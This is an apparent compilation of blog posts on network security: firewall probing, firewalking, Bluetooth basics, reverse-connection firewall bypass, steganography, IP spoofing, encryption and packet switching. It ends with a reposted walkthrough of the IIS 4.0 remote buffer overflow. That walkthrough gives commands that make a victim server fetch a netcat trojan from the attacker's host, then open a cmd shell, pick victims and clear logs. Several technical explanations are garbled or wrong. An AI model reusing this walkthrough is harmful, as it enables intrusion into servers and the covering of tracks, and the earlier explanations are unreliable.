Detection of Network Responses Through Various Symptoms

We may receive following four types of states which can allow us to read response of the network connection, that whether it was accepted or why and where it was rejected, dropped or lost.

No Response – If no packet is received, then there is a chance that original packet have not reached its predefined destination IP address. Other chance is any security devices planted in between my have securely dropped the packet.

RST/ACK – If a RST/ACK packet is received, the packet was either rejected by the IP stack installed on the host, or by an security device (e.g. a Checkpoint reject) installed on host.

SYN/ACK – If a SYN/ACK is received, then the port from which the response was received may be open for connection.

ICMP type 13 – If an ICMP type 13 packet is received, then administrator on host has prohibited this type of connection. (High Level of Security) often a router will use this response to implement it’s ACL security policy.

  
So when we hping some FTP or TCP on any host we should receive ICMP or RST/ACK response. But if we are getting flagged RA response over hping, then it must be noted that any kind of security device is installed on in-between the port and intruder.

Such responses are very cleverly analyzed by ethical hackers to perform further scan and secure their systems with a black box.

Firewall Responses Detection & Breaking The Firewalls

The behavior of packets and its responses explained last post has been noted by a number of firewall vendors. By understanding such enumerations,  the have modified their security system’s for high anonymity by spoofing the source address of the RST/ACK packet to be that of the target host. As such, the response received by an inquisitive attacker is supposed to be a RST/ACK from the target, rather than the gateway.

This is, of course, uncertain as it implies that the packet has reached the target before being rejected, when we may have already assume that there is. But actually there is a gateway that is filtering the traffic.

Breaking any firewall need a vast knowledge on how any firewall works. But rather than that we can also have knowledge on how firewall vendors roved stealth to their systems.
Firewalls Break in

Firewalls Break in Generally in modifies Firewall and Intrusion Detection Systems (IDS) environments, rather than denying unacceptable policies, they will simply drop the packet without any comment. As the scanner never receives a positive or negative response, there is no way of telling whether the packet did not reach the target because of network problems or whether the target no longer exists or if the packet was intentionally drop en route.

And this is where firewalls succeeds & hide from intruder the way network ports are responding and further attack chances are reduced. The resulting ambiguity and timeouts will slow down the scanning process, and prevent many tools from revealing information of any kind.

But this does not mean that this firewall is unbreakable, experiences one’s always have something strong in their hand named – Experience

Piconet : Know The insides of Bluetooth Architecture

Bluetooth is an open system that enables short range wireless communication of data and voice. It comprises of a hardware & a software components.

Bluetooth Architecture consist of the master and the slave arrangement, both are symmetric i.e in same device. In Bluetooth architecture the communication occurs between a master unit and a slave unit, while they share same channel for communication. Each device has a 48 bit unique address that is fixed. Two or more radio devices together form ad-hoc networks called Piconets. These Piconets consist of one master and seven slaves as shown in figure.

Activation of the Piconet is known by the 3 bit active device address . The piconet form the link of one bluetooth device to another bluetooth device .The master is only responsible for establishing the bluetooth link  in the same  device . The slaves are not allowed to communicate between themselves.

Piconet
Piconet

During the communication there are various protocol are also responsible are as follows-
Bluetooth core protocol – Baseband ,LMN ,L2CAP, SDP 
Cable Replacement Protocol – RFCOMM
Telephony Control Protocol – TCS Binary, AT Commands
Adopted Protocols–  PPP, TCP/IP, OBEX, WAP, vCard, vCal, IrMC, WAE

The description of each protocol at each layer:

The RF layer:
The RF layer is lowest defined layer of bluetooth architecture.The Bluetooth air interface is based on a nominal antenna power of  extensions for operating at up to 100 mW  worldwide.
The nominal link range is 10 centimeters – 10 meters, but can be extended to more than 100 meters by increasing the transmit power to 100 mW.

The Bluetooth  Baseband :
This layer defines the timing , frame , packets and the flow control on the link.

The Link Manager 
Responsible for managing connection states enforcing fairness among slaves & power management..

The logical Link Control And Adaptation Protocol
These layer Handles multiplexing, segmentation and reassembly of large packets and device discovery.

Audio
The audio maps the data directly to the Baseband layer.

So, this was the basic introduction of Bluetooth Technology which is today a widely used media for data communication. We are covering this topic so as to give more knowledge for all Ethical Hacking & Bluetooth security interested people.

Firewalk Attack: Beyond The Boundaries of Security.

Firewalk which was developed by two masterminds known as developed by Mike Schiffman and Dave Goldsmith furthers the techniques used both by static port traceroutes and hping.

It can be successfully implemented to scan a host downstream from a security gateway to assess what rules relate to the target system, without any packets having to reach it.

Firewalk utilizes the TTL functions to carry out the whole attack. This was different to analyze by any firewall. And so it was called as beyond the boundaries of security.

Firewalk

Some of the fact that should be true for any kind of firewall responses are:

If the packet is passed by the Firewall, a TTL expired should be received.

If the packet is blocked by the Firewall, this could be caused be either of the following:
An ICMP administratively prohibited response is received or The packet is dropped without comment. Again, uncertainty is introduced through packets lost in transit. Some security gateways will detect the packet is due to expire and send the expired message whether the policy would have allowed the packet or not.

Firewalls and intruders are always the big rivals as firewalls updates with technologies implemented by intruders. Which sometimes makes it harder for firewall vendors and sometimes for hackers.

Reverse Connection for Bypassing The Firewall

If you use reverse connection you can also bypass Hardware Firewalls. The reverse connection is nothing more than the target server connect to the client instead of the client connect to the target server:

Client:20 <——- Target Server:30

Target Server:30 ——–> Client:20

A bi-directional connection between 2 sides has been established. Normally Hardware firewalls only filter/block the outbond traffic meaning that if a computer outside a LAN tries to connect to a computer inside a LAN that is behind a Router/Hardware Firewall it will run into errors like couldn´t connect to the remote computer and so on.

You must notice that this method will only work if the IP address of the computer behind a router is not restricted to access the internet. If only some ports were blocked in the firewall rule, then this method is better than IP spoof since it doesn´t change anything just creates a ‘tunnel’. It is also good to use this when a specific website or keyword to a service or website were used in the Firewall restriction or when you don´t have access to the Firewall Configuration and eventually want that someone outside the LAN access some service of the computer inside the LAN There are tools that creates a tunnel between the target server and the client. These are the TCP/UDP port redirector. A nice GUI (grphical user interface) tool is “WinIPRelay”. get it at http://voodootechs.com and open it.

Click the button “ADD RELAY”

In the field “Local Port” type the port of the local computer you want to use in the connection. Make sure it is not blocked or alredy being used. In the field “Remote Host” type the IP address or if it is a website type the URL

In the field “Remote Port” type the port of the remote computer that will be connecting to you. eg: if it´s a website then the port will usually be 80. if it is a service like Telnet the port is 23. If the remote computer wants to access a service on your computer (the one behind a LAN) then the remote port must be previously setup there, on the remote computer and then you type it in this field. In the field “Connection Timeout” type a numerical value to set the time in seconds that the connection will keep established.

Click OK.

Supposing the service you wanted to access is a website eg: www.msn.com and the local port u chose is 40 then you just open up your internet browser and type: 127.0.0.1:40 and the msn.com webpage will be displayed. Notice that the port 40 must not be blocked.

Now suppose you want your friend to access your telnet server on port 23. If he tries direct connection he won´t be able to connect, so he must open a port on his/her computer and start to listen for connections. Suppose the chosen port was 55 and his IP address is 33.33.33.33 open “WinIPRelay” and set the local port to 23, Remote host to 33.33.33.33 , remote port to 55 and Connection timeout to 999. if he open his command prompt and type: telnet 127.0.0.1 55 he will reverse connect to your telnet server.

HTTP Tunnel –> bi-directional/reverse connection between 2 hosts using port 80 on the computer behind the LAN and using only HTTP requests when establishing the connections.

Steganography: Hiding Files In Images

Steganography is method of hiding files in image files.

This is used mostly on a network so that files can be stored secretly. This method is very harmful for those where source codes of viruses and and programs can be stored. Also some secret file can also be stored and it can be any information about sytem and system weaknesses.

Following are the softwares used for setganography:

Steganography
Steganography

1. Image Hide

2. Snow: Fioles are sored in white or blank spaces of any text files.

3. MP3stegno: Used for storing files in MP3 file format which is almost undetectable.

Prevention Measures Against Steganography:

We can use softwares for setecting such files and we can also tranck the stored content for the security of the system.

Stegdetect: This simple software detects such files stored on system or network.

Stegbreak: Used to crack the password of such files by Dictionary attack.

IP Spoofing Attack

Internet Protocol i.e IP addresses are unique and used for digital data communication for internet. Any mailing system or website technology works on the same principle of digital communication.

IP Spoofing
IP Spoofing

Every computer connected to Network have its unique IP address.

When Person A sends an email  to person B, The mail is assigned with the header which contains the IP’s of sender and Reciver so that mail can go to the same person B and not to some one else.

Now in a private network for security reasons limited mails are accpeted from reserved IP’s.

In Simple word only internal communication can be worked. Person from outside can’t send mail in that network.

So if attacker wants send the mail inside, He will spoof the IP.

He first will sniffs the data packets in the internal communication adn steal some internal email.

Then he will perform changing in header of the mail. he will change content of the mail and send this mail to network again.

System cant provide security against this because it have internal fake IP.

This is how fake IP  is created and attack of spoofing is done.

Thank You all For Reading.

Security with Data Encryption

You might have heard this term many times before but what it is actually? I am trying to explain it here in a small funny scenario.

 

Person A has to send message to B. and some person wanted that message too we name it Mr. X.

 

A wrote the letter and send it B by mail. Now Mr. X get this message by any ways. He reads message and secret in it is revealed.

 

Next time A writes massage in secret words (Encryption) and if now Mr. X gat that message he can not understand what is written. Or get fooled by wrong message and the secret is saved.

 

Ok. Let me explain now data encryption with above scene.

I have a message, I encode it with some key which is known to A and B both.

 

How key works?

Well these are the normal words we use.

ABCDEFG

I encrypt it with Key 2. Now the words become. CDEFGHI

A-> C , B ->D and so on…

 

By this way data get encrypted and third person can’t read if he don’t know the key.

 

By same encryption method, on the networks data get transferred with secured communication. Even if data loss takes place, the data is of no use without decryption.

 

In figure, you can see data first get encrypted with key. The encrypted data is known as Cipher Text. Then with same key, receiver decrypts data and secure transfer takes place.

 

This encryption and decryption is done with the help of programs or clipper chips generally. And they have to be installed on both senders

And receiver end.

 

The Flow of Packet Swithching

 

Data is transmitted from source to destination by packet switching. So what exactly is packet switching.

 

In simple words when you send message through an email the message is broken into chunks of small size and then they travel to destination and again get recombined there, and message is displayed to that user.

 

Just take a look at ‘Figure 1’ –

We have to send message from A to B. we have to make wired communication between them. If distance is 2-3 miles it is possible to do it.

 

But what if I wanted to send message from India to China, is it possible to place wire between every computer? – No way, therefore packet switching is used.

 

In figure 2 –

I have to send data from source A to destination H. Then my data first goes to B then to C, D, G and then to H. The data packets get sent and received to many mid stations (C, D, and G). The same process of breaking chunks and joining repeated through all these points.  The Source and destinations are almost 5000 miles away, still data got transmitted in through other addresses.

 

          Packet switches are named differently as routers, gateways, bridges etc. Some of its advantages are.

 

1. All the data chunks travel through same or different paths but gathers at same address. 

2. The maximum size of packet if kept limited, buffer management becomes simpler.

3. If one chunk is missed in the transfer, for error recovery only one chunk need to be re transmitted.

 

 

So this is how packet switching takes place in the internet world. But thing to notice is that data transfer tries to cover shortest path to reach destination as you can see in Fig.2 that data did not transmitted through E and F. So with the help of packet switching data transfer takes place intelligently and efficiently.

 

Amol Wagh

How to Attack IIS – Buffer Overflow

The Internet Information Server Attack – Remote buffer overflow exploit.
By r00tsec from Security Espionage Community.
Revised 03/16/00.

This site is also available in plain text.

Forewords:
This text goes out to all those NT hackers out there. It is based on the info I have from eEye Digital Security Team, which found the exploit, and my own experience.
Note: All the files used in this paper can be found at the main page.

According to eEye Digital Security Team the systems affected include:

Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4

I performed the attack from a Windows NT 4.0 machine with the required programs:

iishack.exe
ncx.exe or ncx99.exe or BertzSvc.exe

Ncx.exe is a hacked up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that it binds cmd.exe to port 80. The eEye people has received some reports from people not being able use the ncx.exe, so they have made another hacked up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason of why ncx.exe doesn’t work sometimes is that inetinfo.exe has to be exited, before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which also soon will be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.

How to do it:

First of all you’ll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. To find such, go to www.netcraft.com or you favorite “what’s-this-site-running-search-engine” and find a victim running the affected system.Second, you need to craft a buffer overrun about 3 k on the target machine!
Then launch iishack.exe via the command prompt in WinNT.

Output:

——–(IIS 4.0 remote buffer overflow exploit)———-
(c) dark spyrit — barns@eeye.com. http://www.eEye.com

[usage: iishack <host> <port> <url> ]
eg – iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include ‘http://’ before hosts!
———————————————————-

Then issue the command as you can see beneath ex.

C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe

Output (if successful):

Data sent!

note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.

After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu.

Output:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>

Voila! Access granted!
Do you whatever you wanna do, but remember to:

    – add a scheduled task to restart inetinfo.exe in X minutes. (AT command will do it)
    – add a scheduled task to delete ncx.exe X-1 minutes.
    – clean the log files (if there are any).